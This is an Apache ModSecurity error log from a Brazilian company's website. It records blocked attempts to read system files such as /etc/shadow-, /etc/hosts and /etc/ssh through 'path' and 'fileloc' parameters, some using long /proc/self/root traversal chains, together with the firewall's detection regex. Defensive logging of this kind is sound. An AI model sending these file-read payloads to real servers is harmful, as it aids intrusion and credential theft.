[Fri Mar 20 09:19:57.527218 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:46208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07bda6ubjKNq_cu4bmrQAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:57.744393 2026] [:error] [pid 11167:tid 140411683178240] [client 216.73.216.191:57642] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07bfHIg5MgXLBnicMG5gAAAcc"]
[Fri Mar 20 09:19:58.556925 2026] [:error] [pid 7893:tid 140411557287680] [client 216.73.216.191:57714] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07bhCii7xarUs8iHZ3fQAAAhY"]
[Fri Mar 20 09:19:58.883682 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.243.128:46214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07bhCii7xarUs8iHZ3fgAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:59.393996 2026] [:error] [pid 7893:tid 140411641214720] [client 216.73.216.191:57774] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07bxCii7xarUs8iHZ3gAAAAgw"]
[Fri Mar 20 09:20:00.439382 2026] [:error] [pid 11167:tid 140411632822016] [client 74.7.243.128:35700] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07cPHIg5MgXLBnicMG6QAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:20:01.507508 2026] [:error] [pid 11167:tid 140411624429312] [client 216.73.216.191:57922] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07cfHIg5MgXLBnicMG6gAAAc4"]
[Fri Mar 20 09:20:01.830347 2026] [:error] [pid 9818:tid 140411632822016] [client 216.73.216.191:57940] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07cV1pVZ5mVmJwsFNBfwAAAE0"]
[Fri Mar 20 09:20:02.032494 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.243.128:35714] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07cvqxLDW4GITHUkT50QAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:20:03.047787 2026] [:error] [pid 7235:tid 140411632822016] [client 216.73.216.191:57994] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07c_qxLDW4GITHUkT50wAAAQ0"]
[Fri Mar 20 09:20:04.055401 2026] [:error] [pid 15826:tid 140411708356352] [client 216.73.216.191:57948] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07dOoXxyEfFpUF8f-QTgAAAUQ"]
[Fri Mar 20 09:20:04.712483 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:35720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07dOoXxyEfFpUF8f-QUQAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:20:04.843687 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.244.43:44922] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab07dOoXxyEfFpUF8f-QUgAAAUM"]
[Fri Mar 20 09:20:06.220821 2026] [:error] [pid 10189:tid 140411741927168] [client 216.73.216.191:58114] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07djJ3M9BSuKP7CAYutwAAAIA"]
[Fri Mar 20 09:20:06.975624 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.243.128:35734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07djJ3M9BSuKP7CAYuugAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:20:09.075247 2026] [:error] [pid 31215:tid 140411741927168] [client 216.73.216.191:58280] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07eQF0L0L-SsrnPo54YQAAAsA"]
[Fri Mar 20 09:20:09.169778 2026] [:error] [pid 15826:tid 140411574073088] [client 216.73.216.191:58284] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07eeoXxyEfFpUF8f-QXQAAAVQ"]
[Fri Mar 20 09:20:10.616027 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:35742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07euoXxyEfFpUF8f-QYQAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:20:12.705229 2026] [:error] [pid 21219:tid 140411699963648] [client 216.73.216.191:58448] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07e_XLqtnMIWvjpaKqMAAAAoU"]
[Fri Mar 20 09:20:15.356625 2026] [:error] [pid 7893:tid 140411590858496] [client 216.73.216.191:58666] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07fxCii7xarUs8iHZ3oAAAAhI"]
[Fri Mar 20 09:20:15.748683 2026] [:error] [pid 26799:tid 140411582465792] [client 216.73.216.191:58692] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07f9a6ubjKNq_cu4bmxwAAA1M"]
[Fri Mar 20 09:20:16.051601 2026] [:error] [pid 15826:tid 140411725141760] [client 216.73.216.191:58714] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07gOoXxyEfFpUF8f-QZQAAAUI"]
[Fri Mar 20 09:20:19.429516 2026] [:error] [pid 26799:tid 140411691570944] [client 216.73.216.191:58744] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07gNa6ubjKNq_cu4bmygAAA0Y"]
[Fri Mar 20 09:20:19.500492 2026] [:error] [pid 7893:tid 140411548894976] [client 216.73.216.191:58858] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07gxCii7xarUs8iHZ3pgAAAhc"]
[Fri Mar 20 09:20:22.726640 2026] [:error] [pid 7235:tid 140411725141760] [client 216.73.216.191:58996] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07hvqxLDW4GITHUkT55wAAAQI"]
[Fri Mar 20 09:20:25.678314 2026] [:error] [pid 21219:tid 140411616036608] [client 216.73.216.191:58990] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07ifXLqtnMIWvjpaKqOwAAAo8"]
[Fri Mar 20 09:20:26.060378 2026] [:error] [pid 26799:tid 140411624429312] [client 216.73.216.191:59028] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07ita6ubjKNq_cu4bm7AAAA04"]
